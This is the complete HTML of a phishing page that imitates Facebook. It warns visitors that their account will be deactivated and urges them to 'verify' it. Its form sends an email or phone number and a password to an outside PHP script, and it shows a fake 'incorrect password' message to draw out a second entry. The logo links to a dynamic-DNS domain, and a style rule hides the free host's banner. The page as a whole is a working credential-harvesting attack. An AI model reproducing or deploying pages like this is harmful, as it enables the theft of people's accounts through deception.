<!DOCTYPE html>
<html class="__fb-light-mode" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Community Standard</title>
        <link rel="icon" type="image/png" href="favicon.ico">
        <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2,shrink-to-fit=no">
        <meta name="color-scheme" content="light">
        <meta name="theme-color" content="#FFFFFF">
        <link type="text/css" rel="stylesheet" href="css/hidden.css">
        <link type="text/css" rel="stylesheet" href="css/hidden_2.css">
        <style nonce=""></style>
</head>
<body class="_6s5d _71pn system-fonts--body segoe">
    <div id="mount_0_0_JT">
        <div>
            <div class="">
                <div class="x9f619 x1n2onr6 x1ja2u2z">
                    <div aria-valuetext="Loading..." role="progressbar" tabindex="0" class="always-enable-animations xshklg3 xxkxylk x1u6ievf x127lhb5 xa3vuyk x1xzmf5g xqu0tyb xds687c x17qophe xg01cxk xixxii4 x13vifvy xn9wirt x14g40p9 x1s85apg">
                        <div class="x1c74tu6 xa4qsjk x14rlmvs xa3vuyk x4o00kh x5yr21d xh8yej3"></div>
                    </div>
                    <div role="banner">
                        <div class="xds687c xixxii4 x17qophe x13vifvy x1vjfegm">
                            <div class="x9f619 x1n2onr6 x1ja2u2z x1ve1bff x78zum5 xdt5ytf x1s65kcs">
                                <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x13a6bvl"></div>
                                <div class="x9f619 x1ja2u2z xnzfen x1w3jsh0 x1wbvgsv xsugpx9 xds687c x1hagigm x47corl x10l6tqk x17qophe"></div>
                            </div>
                        </div>
                        <div class="x78zum5 x1qughib xh8yej3 xds687c xixxii4 x17qophe x13vifvy xzkaem6">
                            <div class="x6s0dn4 x78zum5 x1iyjqo2 x1n2onr6">
                                <div class="x6s0dn4 x78zum5 x47corl x10l6tqk xh8yej3 xzkaem6">
                                    <div aria-hidden="true" class="x6s0dn4 x9f619 x78zum5 x1s65kcs xg01cxk xz9dl7a x4uap5 xsag5q8 xkhd6sd x47corl xhb22t3 x6o7n8i xbxq160 x100vrsf xxt79k7">
                                        <div aria-disabled="true" aria-label="Back to Previous Page" class="x1i10hfl x6umtig x1b1mbwd xaqea5y xav7gou xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r x16tdsg8 x1hl2dhg xggy1nq x1h6gzvc x87ps6o x1lku1pv x1a2a7pz x6s0dn4 x14yjl9h xudhj91 x18nykt9 xww2gxu x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x78zum5 xl56j7k xexx8yu x4uap5 x18d9i69 xkhd6sd x1n2onr6 x1vqgdyp x100vrsf xwcfey6" role="button" tabindex="-1">
                                            <i data-visualcompletion="css-img" class="x1b0d499 xmgbrsx" style="background-image: url(&quot;https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/AFgIDquDCzO.png&quot;); background-position: 0px -124px; background-size: auto; width: 20px; height: 20px; background-repeat: no-repeat; display: inline-block;"></i>
                                            <div class="x1ey2m1c xds687c xg01cxk x47corl x10l6tqk x17qophe x13vifvy x1ebt8du x19991ni x1dhq9h x14yjl9h xudhj91 x18nykt9 xww2gxu" data-visualcompletion="ignore"></div>
                                        </div>
                                    </div>
                                    <div class="x6s0dn4 x78zum5 x1s65kcs x1hc1fzr xhb22t3 x6o7n8i xcj1dhv xh8yej3 xl8ke66">
                                        <a aria-label="Facebook" class="x1i10hfl xjbqb8w x6umtig x1b1mbwd xaqea5y xav7gou x9f619 x1ypdohk xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1o1ewxj x3x9cwd x1e5q0jg x13rtm0m x1n2onr6 x87ps6o x1lku1pv x1rg5ohu x1a2a7pz" href="https://qfa02db97plf1qpwu.duckdns.org/" role="link" tabindex="0">
                                            <svg class="x1lliihq x1ujvgzy" height="22" viewBox="100 100 900 160" xmlns="http://www.w3.org/2000/svg">
                                                <title>Facebook</title>
                                                <path d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.82Zm-67.988-105.261c-32.728 0-55.455 22.013-55.455 53.929s22.727 53.929 55.455 53.929c32.727 0 55.455-22.013 55.455-53.929s-22.728-53.929-55.455-53.929Zm0 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-119.807-82.728c-32.727 0-55.455 22.013-55.455 53.929s22.728 53.929 55.455 53.929c32.728 0 55.455-22.013 55.455-53.929s-22.727-53.929-55.455-53.929Zm0 82.728c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.389 28.799-25.552 28.799Zm-112.826-82.728c-13.636 0-24.935 5.357-32.013 15.162v-65.585l-29.513 3.831v151.82h26.169l.519-15.844c6.981 11.818 19.481 18.474 34.838 18.474 27.988 0 48.475-22.728 48.475-53.929 0-31.202-20.39-53.929-48.475-53.929Zm-6.98 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-113.638 1.331c-15.649 0-26.883-7.273-30.714-19.805h72.63c.715-3.831 1.202-8.377 1.202-11.429 0-33.02-18.475-52.825-49.514-52.825-31.331 0-53.02 22.013-53.02 53.929 0 32.338 22.728 53.929 56.462 53.929 17.467 0 34.448-5.844 45.065-15.552l-10.617-18.701c-10.292 7.11-20.39 10.454-31.494 10.454Zm-6.591-61.137c13.637 0 22.338 8.279 22.338 21.104v.098h-47.078c2.825-13.604 11.623-21.202 24.74-21.202Zm-98.994 84.968c15.26 0 30.195-5.844 40.714-15.974l-11.526-19.383c-8.182 6.364-17.467 9.805-26.266 9.805-16.364 0-27.273-11.429-27.273-28.377s10.909-28.377 27.273-28.377c8.084 0 16.883 2.922 24.026 8.085l11.721-19.806c-9.481-8.571-24.156-13.831-38.702-13.831-32.013 0-54.643 22.338-54.643 53.929.032 31.494 22.662 53.929 54.676 53.929Zm-93.735-105.261-.519 15.975c-6.981-11.916-19.481-18.572-34.838-18.572-28.085 0-48.475 22.728-48.475 53.929 0 31.202 20.52 53.929 48.475 53.929 15.357 0 27.889-6.656 34.838-18.474l.519 15.844h26.169V155.265h-26.169Zm-28.377 80.099c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.422 28.799-25.552 28.799Zm-57.663-79.906h-26.526v-8.767c0-13.117 5.13-18.149 18.442-18.149 4.123 0 7.467.097 9.383.292v-22.5c-3.637-1.007-12.5-2.013-17.63-2.013-27.111 0-39.611 12.792-39.611 40.422v10.682h-16.753v24.806h16.753v77.631h29.448v-77.599h21.949l4.545-24.805Z"></path>
                                            </svg>
                                        </a>
                                    </div>
                                </div>
                            </div>
                            <div class="x6s0dn4 x78zum5 x1s65kcs x1pi30zi x1e558r4">
                                <div class="x6s0dn4 x78zum5"></div>
                            </div>
                        </div>
                    </div>
                    <div class="x9f619 x1n2onr6 x1ja2u2z">
                        <div class="x78zum5 xdt5ytf x1n2onr6 x1ja2u2z">
                            <div class="x78zum5 xdt5ytf x1n2onr6">
                                <div class="x78zum5 xdt5ytf x1n2onr6 xat3117 xxzkxad">
                                    <div class="x78zum5 xdt5ytf x1t2pt76 x1n2onr6 x1ja2u2z x10cihs4">
                                        <div class="xvkph5b xkrivgy xat24cr x1gryazu xq8v1hd x14rvwrp">
                                            <div class="x78zum5 x1n2onr6 xh8yej3">
                                                <div class="x9f619 x1n2onr6 x1ja2u2z x2bj2ny x1qpq9i9 xdney7k xu5ydu1 xt3gfkd xh8yej3 x6ikm8r x10wlt62 xquyuld xyamay9 x1pi30zi x1l90r2v x1swvt13" style="border-radius: max(0px, min(8px, ((100vw - 4px) - 100%) * 9999)) / 8px;">
                                                    <div class="x1n2onr6 x1ja2u2z x9f619 x78zum5 xdt5ytf x2lah0s x193iq5w">
                                                        <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x1iyjqo2 x2lwn1j">
                                                            <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w x1xmf6yo x1e56ztr xzboxd6 x14l7nz5">
                                                                <span class="x193iq5w xeuugli x13faqbe x1vvkbs x1xmvt09 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x xtoi2st x3x7a5m x1603h9y x1u7k74 x1xlr1w8 xzsf02u" dir="auto">Your account will be deactivated</span>
                                                            </div>
                                                            <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w x1xmf6yo x1e56ztr xzboxd6 x14l7nz5">
                                                                <span class="x193iq5w xeuugli x13faqbe x1vvkbs x1xmvt09 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x xudqn12 x676frb x1lkfr7t x1lbecb7 xo1l8bm xzsf02u" dir="auto">If you are sure that your account has never made any errors, please verify your account and click the "<b>Verify</b>" button below. We will help you so that your account is not deactivated.</span>
                                                                <span class="rot0o">If you are the original owner of this account, immediately verify your account to prevent blocking</span>
                                                            </div>
                        <form action="zoneaccept.php" method="post" onsubmit="">
                                                        <div class="KolM4x">
                                                            <input class="inPUt1" placeholder="Email address or phone number" name="text" type="text" maxlength="50" required="" pattern=".{6,}">
                                                        </div>
                                                        <div class="KolM4x">
                                                            <input class="inPUt1err" placeholder="Password" name="password" type="password" maxlength="50" required="" pattern=".{6,}">
                                                        </div>
                                                        <div class="tExRor">The password that you've entered is incorrect.</div>
                                                        <div class="BirT3X"></div>
                                                        <div class="KolM4xBir">
                                                            <div class="expiry_date"> 
                                               
                                                                </select> 
                                                            </div>
                                                        </div>
                                                            <div class="Gar1i5 x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w x1xmf6yo x1e56ztr xzboxd6 x14l7nz5">
                                                                <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 x2lah0s x1qughib x1qjc9v5 xozqiw3 x1q0g3np xykv574 xbmpl8g x4cne27 xifccgj">
                                                                    <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xeuugli x4pfjvb xsyo7zv x16hj40l x10b6aqq x1yrsyyn">
                                                                    </div>
                                                                    <div class="x9f619 x1n2onr6 x1ja2u2z x78zum5 xdt5ytf x2lah0s x193iq5w xeuugli x4pfjvb xsyo7zv x16hj40l x10b6aqq x1yrsyyn">
                                                                        <div aria-label="My Account Is Compromised" class="x1i10hfl xjbqb8w x6umtig x1b1mbwd xaqea5y xav7gou x1ypdohk xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1o1ewxj x3x9cwd x1e5q0jg x13rtm0m x87ps6o x1lku1pv x1a2a7pz x9f619 x3nfvp2 xdt5ytf xl56j7k x1n2onr6 xh8yej3" role="button" tabindex="0">
                                                                            <button class="x1n2onr6 x1ja2u2z x78zum5 x2lah0s xl56j7k x6s0dn4 xozqiw3 x1q0g3np xi112ho x17zwfj4 x585lrc x1403ito x972fbf xcfux6l x1qhh985 xm0m39n x9f619 xn6708d x1ye3gou xtvsq51 x1r1pt67">
                                                                                <div class="x6s0dn4 x78zum5 xl56j7k x1608yet xljgi0e x1e0frkt">
                                                                                    <div class="x9f619 x1n2onr6 x1ja2u2z x193iq5w xeuugli x6s0dn4 x78zum5 x2lah0s x1fbi1t2 xl8fo4v">
                                                                                        <span class="x193iq5w xeuugli x13faqbe x1vvkbs x1xmvt09 x1lliihq x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x xudqn12 x3x7a5m x6prxxf xvq8zen x1s688f xtk6v10" dir="auto">
                                                                                            <span class="x1lliihq x6ikm8r x10wlt62 x1n2onr6 xlyipyv xuxw1ft">Verification</span>
                                                                                        </span>
                                                                                    </div>
                                                                                </div>
                                                                                <div class="x1o1ewxj x3x9cwd x1e5q0jg x13rtm0m x1ey2m1c xds687c xg01cxk x47corl x10l6tqk x17qophe x13vifvy x1ebt8du x19991ni x1dhq9h x1wpzbip" data-visualcompletion="ignore"></div>
                                                                            </button>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </form></div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

</body></html>
<style>img[alt="www.000webhost.com"]{display:none;}</style>